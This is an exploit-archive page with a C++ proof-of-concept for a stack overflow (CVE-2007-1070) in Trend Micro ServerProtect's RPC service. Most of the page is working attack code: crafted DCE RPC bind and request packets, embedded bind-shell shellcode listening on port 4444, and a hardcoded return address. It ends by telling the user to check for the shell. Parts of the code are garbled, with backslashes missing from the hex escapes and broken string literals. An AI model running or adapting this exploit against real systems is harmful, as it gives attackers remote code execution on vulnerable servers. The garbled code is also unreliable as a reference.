Home / exploitsPDF  

trendmicro-overflow.txt

Posted on 06 September 2007

/*
* Copyright (c) 2007 devcode
*
*
*			^^ D E V C O D E ^^
*
* Trend Micro ServerProtect eng50.dll Stack Overflow
* [CVE-2007-1070]
*
*
* Description:
*    A boundary error within a function in eng50.dll can be
*    exploited to cause a stack-based buffer overflow via a
*    specially crafted RPC request to the SpntSvc.exe service.
*
* Hotfix/Patch:
*    http://www.trendmicro.com/download/product.asp?productid=17
*
* Vulnerable systems:
*    ServerProtect for Windows 5.58
*    ServerProtect for EMC 5.58
*    ServerProtect for Network Appliance Filer 5.61
*    ServerProtect for Network Appliance Filer 5.62
*
* Tested on:
* 	  Microsoft Windows 2000 SP4
*
*    This is a PoC and was created for educational purposes only. The
*    author is not held responsible if this PoC does not work or is
*    used for any other purposes than the one stated above.
*
* Notes:
*	  <3 TippingPoint for technical details. Had this made few days after
*    disclosure (few months back), was rlsd on r1918 about a week ago
*    and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW
*    I WAS THIS HOT DAYUM
*
*
*/
#include <iostream>
#include <windows.h>

#pragma comment( lib, "ws2_32.lib" )

/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
unsigned char uszDceBind[] =
"x05x00x0Bx03x10x00x00x00x48x00x00x00x01x00x00x00"
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
"x88x88x28x25x5BxBDxD1x11x9Dx53x00x80xC8x3Ax5Cx2C"
"x01x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
"x2Bx10x48x60x02x00x00x00";

/* rpc_opnum_0 */
unsigned char uszDceCall[] =
"x05x00x00x83x10x00x00x00x08x08x00x00x01x00x00x00"
"xE0x07x00x00x00x00x00x00x88x88x28x25x5BxBDxD1x11"
"x9Dx53x00x80xC8x3Ax5Cx2Cx04x00x03x00xD0x07x00x00";

/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
unsigned char uszShellcode[] =
"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x76xd2xab"
"x1fx83xebxfcxe2xf4x8axb8x40x52x9ex2bx54xe0x89xb2"
"x20x73x52xf6x20x5ax4ax59xd7x1ax0exd3x44x94x39xca"
"x20x40x56xd3x40x56xfdxe6x20x1ex98xe3x6bx86xdax56"
"x6bx6bx71x13x61x12x77x10x40xebx4dx86x8fx37x03x37"
"x20x40x52xd3x40x79xfdxdexe0x94x29xcexaaxf4x75xfe"
"x20x96x1axf6xb7x7exb5xe3x70x7bxfdx91x9bx94x36xde"
"x20x6fx6ax7fx20x5fx7ex8cxc3x91x38xdcx47x4fx89x04"
"xcdx4cx10xbax98x2dx1exa5xd8x2dx29x86x54xcfx1ex19"
"x46xe3x4dx82x54xc9x29x5bx4ex79xf7x3fxa3x1dx23xb8"
"xa9xe0xa6xbax72x16x83x7fxfcxe0xa0x81xf8x4cx25x81"
"xe8x4cx35x81x54xcfx10xbaxbax43x10x81x22xfexe3xba"
"x0fx05x06x15xfcxe0xa0xb8xbbx4ex23x2dx7bx77xd2x7f"
"x85xf6x21x2dx7dx4cx23x2dx7bx77x93x9bx2dx56x21x2d"
"x7dx4fx22x86xfexe0xa6x41xc3xf8x0fx14xd2x48x89x04"
"xfexe0xa6xb4xc1x7bx10xbaxc8x72xffx37xc1x4fx2fxfb"
"x67x96x91xb8xefx96x94xe3x6bxecxdcx2cxe9x32x88x90"
"x87x8cxfbxa8x93xb4xddx79xc3x6dx88x61xbdxe0x03x96"
"x54xc9x2dx85xf9x4ex27x83xc1x1ex27x83xfex4ex89x02"
"xc3xb2xafxd7x65x4cx89x04xc1xe0x89xe5x54xcfxfdx85"
"x57x9cxb2xb6x54xc9x24x2dx7bx77x99x1cx4bx7fx25x2d"
"x7dxe0xa6xd2xabx1f";

void usage( ) {
printf("
		Trend Micro ServerProtect Stack Overflow
"
"			(c) 2007 devcode

"
"usage: tmicro.exe <ip> <port>
");
}

int main( int argc, char **argv ) {
WSADATA wsaData;
SOCKET sConnect;
SOCKADDR_IN sockAddr;
char szRecvBuf[512];
unsigned char uszPacket[2056];
int nRet;

if ( argc < 3 ) {
usage( );
return -1;
}

if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
printf("[-] Unable to startup winsock
");
return -1;
}

sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( sConnect == INVALID_SOCKET ) {
printf("[-] Invalid socket
");
return -1;
}

sockAddr.sin_family = AF_INET;
sockAddr.sin_addr.s_addr = inet_addr( argv[1] );
sockAddr.sin_port = htons( atoi( argv[2] ) );

printf("[+] Connecting to %s:%s
", argv[1], argv[2] );
nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
if ( nRet == SOCKET_ERROR ) {
printf("[-] Cannot connect to server
");
closesocket( sConnect );
return -1;
}

printf("[+] Sending DCE Bind packet...
");
nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
if ( nRet  == SOCKET_ERROR ) {
printf("[-] Cannot send
");
closesocket( sConnect );
return -1;
}

nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
if ( nRet <= 0 ) {
printf("[-] Recv failed
");
closesocket( sConnect );
return -1;
}

memset( uszPacket, 0x41, sizeof( uszPacket ) );
memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
/* call ebx, 0x6574131C, TmRpcSrv.dll */
/* jmp ebx, 0x7C4E4A66, kernel32.dll */
memcpy( uszPacket + 1198, "x1Cx13x74x65", 4 );
memcpy( uszPacket + 2048, "xD0x07x00x00xD0x07x00x00", 8 );

printf("[+] Sending DCE Request packet...
");
nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
if ( nRet == SOCKET_ERROR ) {
printf("[-] Cannot send
");
closesocket( sConnect );
return -1;
}

printf("[+] Check shell on port 4444 :)
");
nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
closesocket( sConnect );
return 0;
}

 

TOP

Malware :

Exploits :